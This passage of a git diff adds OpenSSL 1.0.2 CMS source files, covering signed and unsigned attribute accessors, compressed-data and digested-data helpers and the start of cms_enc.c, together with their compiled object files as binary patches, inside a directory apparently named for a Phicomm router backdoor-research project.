+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include "cms.h"
+#include "cms_lcl.h"
+
+/* CMS SignedData Attribute utilities */
+
+int CMS_signed_get_attr_count(const CMS_SignerInfo *si)
+{
+    return X509at_get_attr_count(si->signedAttrs);
+}
+
+int CMS_signed_get_attr_by_NID(const CMS_SignerInfo *si, int nid, int lastpos)
+{
+    return X509at_get_attr_by_NID(si->signedAttrs, nid, lastpos);
+}
+
+int CMS_signed_get_attr_by_OBJ(const CMS_SignerInfo *si, ASN1_OBJECT *obj,
+                               int lastpos)
+{
+    return X509at_get_attr_by_OBJ(si->signedAttrs, obj, lastpos);
+}
+
+X509_ATTRIBUTE *CMS_signed_get_attr(const CMS_SignerInfo *si, int loc)
+{
+    return X509at_get_attr(si->signedAttrs, loc);
+}
+
+X509_ATTRIBUTE *CMS_signed_delete_attr(CMS_SignerInfo *si, int loc)
+{
+    return X509at_delete_attr(si->signedAttrs, loc);
+}
+
+int CMS_signed_add1_attr(CMS_SignerInfo *si, X509_ATTRIBUTE *attr)
+{
+    if (X509at_add1_attr(&si->signedAttrs, attr))
+        return 1;
+    return 0;
+}
+
+int CMS_signed_add1_attr_by_OBJ(CMS_SignerInfo *si,
+                                const ASN1_OBJECT *obj, int type,
+                                const void *bytes, int len)
+{
+    if (X509at_add1_attr_by_OBJ(&si->signedAttrs, obj, type, bytes, len))
+        return 1;
+    return 0;
+}
+
+int CMS_signed_add1_attr_by_NID(CMS_SignerInfo *si,
+                                int nid, int type, const void *bytes, int len)
+{
+    if (X509at_add1_attr_by_NID(&si->signedAttrs, nid, type, bytes, len))
+        return 1;
+    return 0;
+}
+
+int CMS_signed_add1_attr_by_txt(CMS_SignerInfo *si,
+                                const char *attrname, int type,
+                                const void *bytes, int len)
+{
+    if (X509at_add1_attr_by_txt(&si->signedAttrs, attrname, type, bytes, len))
+        return 1;
+    return 0;
+}
+
+void *CMS_signed_get0_data_by_OBJ(CMS_SignerInfo *si, ASN1_OBJECT *oid,
+                                  int lastpos, int type)
+{
+    return X509at_get0_data_by_OBJ(si->signedAttrs, oid, lastpos, type);
+}
+
+int CMS_unsigned_get_attr_count(const CMS_SignerInfo *si)
+{
+    return X509at_get_attr_count(si->unsignedAttrs);
+}
+
+int CMS_unsigned_get_attr_by_NID(const CMS_SignerInfo *si, int nid,
+                                 int lastpos)
+{
+    return X509at_get_attr_by_NID(si->unsignedAttrs, nid, lastpos);
+}
+
+int CMS_unsigned_get_attr_by_OBJ(const CMS_SignerInfo *si, ASN1_OBJECT *obj,
+                                 int lastpos)
+{
+    return X509at_get_attr_by_OBJ(si->unsignedAttrs, obj, lastpos);
+}
+
+X509_ATTRIBUTE *CMS_unsigned_get_attr(const CMS_SignerInfo *si, int loc)
+{
+    return X509at_get_attr(si->unsignedAttrs, loc);
+}
+
+X509_ATTRIBUTE *CMS_unsigned_delete_attr(CMS_SignerInfo *si, int loc)
+{
+    return X509at_delete_attr(si->unsignedAttrs, loc);
+}
+
+int CMS_unsigned_add1_attr(CMS_SignerInfo *si, X509_ATTRIBUTE *attr)
+{
+    if (X509at_add1_attr(&si->unsignedAttrs, attr))
+        return 1;
+    return 0;
+}
+
+int CMS_unsigned_add1_attr_by_OBJ(CMS_SignerInfo *si,
+                                  const ASN1_OBJECT *obj, int type,
+                                  const void *bytes, int len)
+{
+    if (X509at_add1_attr_by_OBJ(&si->unsignedAttrs, obj, type, bytes, len))
+        return 1;
+    return 0;
+}
+
+int CMS_unsigned_add1_attr_by_NID(CMS_SignerInfo *si,
+                                  int nid, int type,
+                                  const void *bytes, int len)
+{
+    if (X509at_add1_attr_by_NID(&si->unsignedAttrs, nid, type, bytes, len))
+        return 1;
+    return 0;
+}
+
+int CMS_unsigned_add1_attr_by_txt(CMS_SignerInfo *si,
+                                  const char *attrname, int type,
+                                  const void *bytes, int len)
+{
+    if (X509at_add1_attr_by_txt(&si->unsignedAttrs, attrname,
+                                type, bytes, len))
+        return 1;
+    return 0;
+}
+
+void *CMS_unsigned_get0_data_by_OBJ(CMS_SignerInfo *si, ASN1_OBJECT *oid,
+                                    int lastpos, int type)
+{
+    return X509at_get0_data_by_OBJ(si->unsignedAttrs, oid, lastpos, type);
+}
+
+/* Specific attribute cases */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_att.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_att.o
new file mode 100644
index 0000000000000000000000000000000000000000..86f493a92c7995c85aeeedc89196d4ba5b9079d7
GIT binary patch
literal 4600
zcmb`LU1%It6vyv&tBsm3KU$-$vLLM%?Kr6sX~mMSP1YD2wJnCyGS2RfiJ0Al-C0Nk
zTcHXC`=AdMA4Gi6M@7_@fPxDmZK0q(_|Uf~BKp)yeNa*AIWy<%o;iEx!P*Oxd++c5
z&zW=Yow;W=NAuGY>oOU`C1duOc8{qstG(^^aMT<&J*L}S?z{W1!s|x|enob*ou>-N
z&J6s59u5{>YxbRN_ML8ih0d<wfDY1?5&!272Ii(ke2oSm;y5ldIX1RCci(|xqZ&4H
zyPSs{cgNr(ji@_#WT)%6L)&9)%z9YFez>lKYjW=av(A_%vMgL!Zi_3EdFdIGS?<ql
z?%vS#25dOmY@x9ps*$-CHf~|F7Pg=m-uo3|cVM0G?VsxHieh>@g@2sF&ssRfyGC5j
z;dcw`qK91Swpf^JVdIM7yk?2%c`c>z<0<?-3&(k_66bhnN*xu-)|=n1bPNE<THkEs
z{B$I(veDC&WZ27^>pNk@H>B{c6pl}6vfKpSTSS~Z->txL9dvmVfQ>&59R098*Z54@
z^v6hlC)8M2|1Pv``cuHs|Gg-N!uoU2w&^bbNBt0rp|JiEv~Bt<Y$WPOBDFEma|P`I
z;5Pks(jQd%e2V@s>FY|rlA?c;^e2@5!xa73r2l~QJl`Ku^na566Q$n>2N<rymx}Ks
zeqQkz;<(;e_`U)0pJUwOM~Gi0&g*=VcsIm_h54t%w<`V}@jZ%PB>pUMj>nWLb<Yn&
zr)0*S+~?I_n5zb5Z!QQC*1Xapob|?=oSqpSnf7KTCidm`d;3R5r}Lhfec0XQhgxg%
zQe5%&K0e-IKsd!>W^~GCf!Jc9rBYK47J@K{Cd4v{gg3uj9!%)kz^3wG1|rOsn0cCw
zSd4@X@-&-pIpp9IHpqny?40YB{m|za+PjqGXw#_L_uD=uwyV>SR>Eo-#n&>?OWzu3
zO)IHyVV+Uq9*I$2zfPBE%PZ9y?N}>#zn+NRviSRDBeeg%5|^^zw+sHV;P`H`{w={b
z3;vJb(*GuUFYy~m`hQSx>AxVj^nZi!k2#Fv*(5l=`^@hVyiagf@S6pHOz>L;|48t=
z1pi!c84rIq;e2I0-wVBr=SRV1JQoF*@jNHiN5+#QJsgMlP1-7)51I4%SRe&+&dY}s
z=lr{*IQxB7@e%63qd4cy&lKnU$a#k2;XL@0(sRE1LvhY)oKM&f=d~QI8*{$jkm47}
zFF%K@=e%}E={c{3igO$%6z9D5zT%wMzEGU=nsMqYmC!Fj9oFJ{o?EqG!FR#{4onA6
zNaGaib>oy4E0q9}oKsy40|$Pq?5Kx+=|$?#RU6JyZE-26g)7F1JOuOJ^EJN`&<gy&
zDhK8`75ybU3=B(|<{9^5Ew{18cOT!OVYp;Deq-EQBYW&(lfQrmNW6`>{_^H^Ct0gf
z;g|<t1btqu{UF$)Pd;y;85O?&{S2t)`*Xb;IJc$r8ymD}r-0$F1$=&G`IhW+5<;8T
zk8u$iDAo3t$o{N~L)#w)TigE4cgJ^FBYWIGv}JqVKij?0a+NluNj09mm>aY`GQD?z
e%rgCi>QRGgItI^TB|&pjp#Re>M7{POZT~MB7}faz

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_cd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_cd.c
new file mode 100644
index 0000000..aa3238f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_cd.c
@@ -0,0 +1,134 @@
+/* crypto/cms/cms_cd.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include <openssl/bio.h>
+#ifndef OPENSSL_NO_COMP
+# include <openssl/comp.h>
+#endif
+#include "cms_lcl.h"
+
+DECLARE_ASN1_ITEM(CMS_CompressedData)
+
+#ifdef ZLIB
+
+/* CMS CompressedData Utilities */
+
+CMS_ContentInfo *cms_CompressedData_create(int comp_nid)
+{
+    CMS_ContentInfo *cms;
+    CMS_CompressedData *cd;
+    /*
+     * Will need something cleverer if there is ever more than one
+     * compression algorithm or parameters have some meaning...
+     */
+    if (comp_nid != NID_zlib_compression) {
+        CMSerr(CMS_F_CMS_COMPRESSEDDATA_CREATE,
+               CMS_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
+        return NULL;
+    }
+    cms = CMS_ContentInfo_new();
+    if (!cms)
+        return NULL;
+
+    cd = M_ASN1_new_of(CMS_CompressedData);
+
+    if (!cd)
+        goto err;
+
+    cms->contentType = OBJ_nid2obj(NID_id_smime_ct_compressedData);
+    cms->d.compressedData = cd;
+
+    cd->version = 0;
+
+    X509_ALGOR_set0(cd->compressionAlgorithm,
+                    OBJ_nid2obj(NID_zlib_compression), V_ASN1_UNDEF, NULL);
+
+    cd->encapContentInfo->eContentType = OBJ_nid2obj(NID_pkcs7_data);
+
+    return cms;
+
+ err:
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+
+    return NULL;
+}
+
+BIO *cms_CompressedData_init_bio(CMS_ContentInfo *cms)
+{
+    CMS_CompressedData *cd;
+    ASN1_OBJECT *compoid;
+    if (OBJ_obj2nid(cms->contentType) != NID_id_smime_ct_compressedData) {
+        CMSerr(CMS_F_CMS_COMPRESSEDDATA_INIT_BIO,
+               CMS_R_CONTENT_TYPE_NOT_COMPRESSED_DATA);
+        return NULL;
+    }
+    cd = cms->d.compressedData;
+    X509_ALGOR_get0(&compoid, NULL, NULL, cd->compressionAlgorithm);
+    if (OBJ_obj2nid(compoid) != NID_zlib_compression) {
+        CMSerr(CMS_F_CMS_COMPRESSEDDATA_INIT_BIO,
+               CMS_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
+        return NULL;
+    }
+    return BIO_new(BIO_f_zlib());
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_cd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_cd.o
new file mode 100644
index 0000000000000000000000000000000000000000..1259a42494b0bb217dd2fe10397f4ca70ea6ed27
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ES5JBqyu_1=c1is}^dNy!dlB(c5HFIXL80V>WCQl1f5D&Qv46>5
zpfkxXF1x9R4ou$8+xKQCoAzULciV9sP~pH0{8fqt_|izfrhVwa7QlEoymk*KVU>!?
zz2axw>klrgx*WWpdfYodYUrj{7hxN74Rd@yfeyfeIEMLO(D7aP{%O;&)`_Vnc5ex`
z<TO@KWg8f*+axj!C$b_+%I9dxBLH5`6A^@nqG<3{twj7LfKLMv01wL&c$6hcoFbQI
zBIbB8{Za(cOx7=H#q%P|<3h}>16L#V&_;J^zL~$Io%Z=_#XdfXGryZ(@7fR3e}Ixr
z%vJp-=%t<>rXId5j&%~(>U@P48mCKVdZDeAPf;UWY+#zduv`jUi3;dl^`L&Hm-auU
qXd#h&Dv8>aJpS{nyQ8fKIcQJn6qxhx;D&kkq<xaYM`e^~`hNlVX*k6I

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_dd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_dd.c
new file mode 100644
index 0000000..23e9f2d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_dd.c
@@ -0,0 +1,145 @@
+/* crypto/cms/cms_dd.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include "cms_lcl.h"
+
+DECLARE_ASN1_ITEM(CMS_DigestedData)
+
+/* CMS DigestedData Utilities */
+
+CMS_ContentInfo *cms_DigestedData_create(const EVP_MD *md)
+{
+    CMS_ContentInfo *cms;
+    CMS_DigestedData *dd;
+    cms = CMS_ContentInfo_new();
+    if (!cms)
+        return NULL;
+
+    dd = M_ASN1_new_of(CMS_DigestedData);
+
+    if (!dd)
+        goto err;
+
+    cms->contentType = OBJ_nid2obj(NID_pkcs7_digest);
+    cms->d.digestedData = dd;
+
+    dd->version = 0;
+    dd->encapContentInfo->eContentType = OBJ_nid2obj(NID_pkcs7_data);
+
+    cms_DigestAlgorithm_set(dd->digestAlgorithm, md);
+
+    return cms;
+
+ err:
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+
+    return NULL;
+}
+
+BIO *cms_DigestedData_init_bio(CMS_ContentInfo *cms)
+{
+    CMS_DigestedData *dd;
+    dd = cms->d.digestedData;
+    return cms_DigestAlgorithm_init_bio(dd->digestAlgorithm);
+}
+
+int cms_DigestedData_do_final(CMS_ContentInfo *cms, BIO *chain, int verify)
+{
+    EVP_MD_CTX mctx;
+    unsigned char md[EVP_MAX_MD_SIZE];
+    unsigned int mdlen;
+    int r = 0;
+    CMS_DigestedData *dd;
+    EVP_MD_CTX_init(&mctx);
+
+    dd = cms->d.digestedData;
+
+    if (!cms_DigestAlgorithm_find_ctx(&mctx, chain, dd->digestAlgorithm))
+        goto err;
+
+    if (EVP_DigestFinal_ex(&mctx, md, &mdlen) <= 0)
+        goto err;
+
+    if (verify) {
+        if (mdlen != (unsigned int)dd->digest->length) {
+            CMSerr(CMS_F_CMS_DIGESTEDDATA_DO_FINAL,
+                   CMS_R_MESSAGEDIGEST_WRONG_LENGTH);
+            goto err;
+        }
+
+        if (memcmp(md, dd->digest->data, mdlen))
+            CMSerr(CMS_F_CMS_DIGESTEDDATA_DO_FINAL,
+                   CMS_R_VERIFICATION_FAILURE);
+        else
+            r = 1;
+    } else {
+        if (!ASN1_STRING_set(dd->digest, md, mdlen))
+            goto err;
+        r = 1;
+    }
+
+ err:
+    EVP_MD_CTX_cleanup(&mctx);
+
+    return r;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_dd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_dd.o
new file mode 100644
index 0000000000000000000000000000000000000000..25a5454e0b7ba4892eac7df8445c9d72ec826f9f
GIT binary patch
literal 3168
zcmbuBO>7%Q6oAM1p$3voS``{7sw{9J2)e{=1!*N9>)6S<I0?iKD$r=+pG|CHuPuA5
zCPlPFC5V+9HJ3`95I3%z5h6y7RB__K5d<6%6a`TsgoG-p^4{!BJXyRKc+&X2`R2Vh
zGjDcxd?}us=n4dglmK~ww0n{g61ul-k8yL1^pigF$H0->#+;F!Go3rBS8n1+!r3<0
zTkJJ+<9Y0IW;)k_HTsjz&+*8Q9PNy5JtT({&be?f*<2pndVnYB37a>%+riDZf~NCZ
z!il@dUQaqdyfJT_Gv=@3^k#E1Xf{`ZzhHp7o`iD;mXvb7HrIar0I2D(aM0W+g@;V%
zR^Dv(93AHL-SGRMBQ3t5sb(4Sprdmu(VPo%2ph>KH}YZA+(?HH!bsBjNeo<ksR=02
ze0ym98x}iti1o!It;m<3u0qP4kl8#RgxwmSVKrr{XIzgD0e#+ppDkSuLREJ5LvC4}
z^_DSkZ5!s}p=Q%vY2G~HE}iwdd~F-I7u&4|nH(QK9U7j?Hf+`iozhR}BgZ1oHF!62
z@%V^7a`H(RLl{aAv_WXS&?cwnNEab3WW4&I4?;r;T$m++mBGN_zJ0+>*wRU0kMI#f
zE}@>#1~<B*+R&A5Lkqpv6Vrw-_Zr$r*OE3I(?W(e6x9Z!S`g<-i@5zlkAf};`z~sp
zE54h{z+4Hf73lhYZ!!_nNnzD{$nQLzcf7mf6OMb9yWSho&8xJRVXvFq^KZ!cJ|7<R
z;aL5>avyXLDC^`k2KFd4tf5!1hMjoQhcEbW+lOEF;a7e5$G~y@a^3Q*zwq(@PWW$v
zMv({i7ucQl6@&xs#E<&$Q6K)I51;bk^FF-l!%41Or}?~|<3_BwWYw9Kk7Zbf=4w`k
zS%gj|XQD=u&P+_C;%S;TqRBWV<5MX*Ua^^FvxL1^p|*9NvppG#j2Nlu2rV+Jyz8Mx
zE!HfH%tX&nyO=*-$-b#9!YD0OYDHEk)4IhJE*4j`i;QNA6=kFy(P2=8<tuctXlF_!
z{_4wgDn`fCXDNDjOaq>Inqw>6+1=O#22*Q=l&x~ETqW_@Sz2u{YSn6$n!DLldNwgV
z$ycpRk}FvmyHO>S)>$UEOml^0x|k`J_`?K01H!;>+x^h~zU#^n!Qs0Hw^^G%COG={
zEBsl7YYLAl9Oshx7kqeC;rJX&{~HR&Z?ELvDje@f$^TUNg9?8Fo<|g1{~>77Kc?^@
zg{Kvc*Ru4_D*R!EUr_jAg<k<11?N2gP38%Kje>Q?CgrR!B$wX{d2o_%$^gB-T4tFn
z(d(?{>VmXtRw<)1YlRU#4=)(ev-LXBbCq%#-Xfyg6=vyh#~tHOi0Cib4ZT{cRIM6Y
zB|6Vw73g9uQ?}%c|4WA;8cXH9DaL@ITorY6d#<mvQDbefmSfOVxhWF9BjWMCKvUi@
zc(y2yLqqPp*}n43i@qpc{4_Ak`CsEBBIgKbRpk6nsSs>AztpD{rn=si4l3;6dj=TZ
z#_BW2Lj(x%PWwmJPm(McIF&a(B)~_~QD|@cJn&BER}hY-h{N+kB;)1zb($MPT5^7&
p@tcN!(Y^7=yk`f9EQr4xYo0oKx&-g-PVt|JiR62VIZ?dv{{X}F_!<BJ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_enc.c
new file mode 100644
index 0000000..85ae928
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_enc.c
@@ -0,0 +1,260 @@
+/* crypto/cms/cms_enc.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include <openssl/rand.h>
+#include "cms_lcl.h"
+
+/* CMS EncryptedData Utilities */
+
+DECLARE_ASN1_ITEM(CMS_EncryptedData)
+
+/* Return BIO based on EncryptedContentInfo and key */
+
+BIO *cms_EncryptedContent_init_bio(CMS_EncryptedContentInfo *ec)
+{
+    BIO *b;
+    EVP_CIPHER_CTX *ctx;
+    const EVP_CIPHER *ciph;
+    X509_ALGOR *calg = ec->contentEncryptionAlgorithm;
+    unsigned char iv[EVP_MAX_IV_LENGTH], *piv = NULL;
+    unsigned char *tkey = NULL;
+    size_t tkeylen = 0;
+
+    int ok = 0;
+
+    int enc, keep_key = 0;
+
+    enc = ec->cipher ? 1 : 0;
+
+    b = BIO_new(BIO_f_cipher());
+    if (!b) {
+        CMSerr(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    BIO_get_cipher_ctx(b, &ctx);
+
+    if (enc) {
+        ciph = ec->cipher;
+        /*
+         * If not keeping key set cipher to NULL so subsequent calls decrypt.
+         */
+        if (ec->key)
+            ec->cipher = NULL;
+    } else {
+        ciph = EVP_get_cipherbyobj(calg->algorithm);
+
+        if (!ciph) {
